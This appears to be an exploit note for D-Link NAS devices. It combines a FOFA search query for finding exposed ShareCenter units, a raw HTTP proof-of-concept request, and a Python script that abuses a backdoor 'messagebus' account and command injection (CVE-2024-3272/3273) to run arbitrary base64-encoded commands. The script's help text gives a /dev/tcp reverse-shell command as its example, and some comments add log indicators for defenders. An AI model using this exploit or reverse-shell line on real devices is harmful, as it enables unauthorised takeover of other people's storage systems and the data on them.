
D-Link-NAS(CVE-2024-3272&&CVE-2024-3273)

fofa

body="Text:In order to access the ShareCenter"

poc

GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd==&cmd=15&system=aWQ= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/40.0.874.0 Safari/531.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close

1f355c5370398227eca27bbebee72708

脚本

# Author: Nick Swink (c0rnbread)
# Original post: https://github.com/netsecfish/dlink
# CVE-2024-3272 + CVE-2024-3273
#
# Description: Backdoor account authentication bypass (CVE-2024-3272) + command injection (CVE-2024-3273)
# Affected Devices:
#     DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013
#     DNS-325 Version 1.01
#     DNS-327L Version 1.09, Version 1.00.0409.2013
#     DNS-340L Version 1.08

import requests, argparse, base64

def main(url: str, command: str) -> None:
    """Send one crafted GET to ``nas_sharing.cgi`` and print the decoded reply.

    The query string supplies ``user=messagebus`` with an empty ``passwd``
    and carries ``command``, base64-encoded, in the ``system`` parameter
    alongside ``cmd=15``.

    Args:
        url: Base URL of the device's web interface; the path and query
            string are appended to it unchanged.
        command: Text that is base64-encoded into the ``system`` parameter.

    Returns:
        None. Everything is reported with ``print``; on a non-200 status
        the process exits.

    Defender notes: the fixed parts of this request are the useful log
    indicators -- the ``/cgi-bin/nas_sharing.cgi`` path, ``user=messagebus``,
    an empty ``passwd`` and a base64 value in ``system``. Any hit on an
    internet-reachable device should be treated as a compromise lead.
    """

    # Standard (not URL-safe) base64; the value is placed in the URL as-is,
    # so log searches should match the raw base64 text.
    base64_command = base64.b64encode(command.encode('utf-8'))
    base64_command = base64_command.decode('utf-8')

    uri = f"/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system={base64_command}"  

    print("Sending exploit request to endpoint...")
    print(url + uri)

    # No timeout is passed, so this call can block indefinitely on a host
    # that accepts the connection but never answers.
    r = requests.get(url + uri)

    # A 200 only shows that something answered at this path; the script does
    # not verify that the body is output from the device.
    if r.status_code == 200:
        print("Status code: 200")
        print("Exploit appeared to succeed!")
        # NOTE(review): b64decode()/decode() are not wrapped in any handler,
        # so a 200 body that is not base64-encoded UTF-8 may raise here.
        print(f"\n\tPrinting output: {base64.b64decode(r.text).decode('utf-8')}")


    else:
        print("Status NOT 200")
        print("Exploit Failed. Exiting...")
        # exit() with no argument ends the process with status 0, so a
        # calling script cannot tell this path from a normal finish.
        exit()


if __name__ == "__main__":
    # Command-line entry point: two positional arguments, both handed to
    # main() exactly as typed (no validation or normalisation happens here).
    cli = argparse.ArgumentParser(
        description="Execute arbitrary command on remote system."
    )
    cli.add_argument(
        "url",
        help="Base URL of the D-Link web interface. e.g., http://example.com",
    )
    cli.add_argument(
        "command",
        help="Command to be executed. e.g., /bin/sh -i >& /dev/tcp/localhost/9999 0>&1",
    )

    opts = cli.parse_args()
    main(opts.url, opts.command)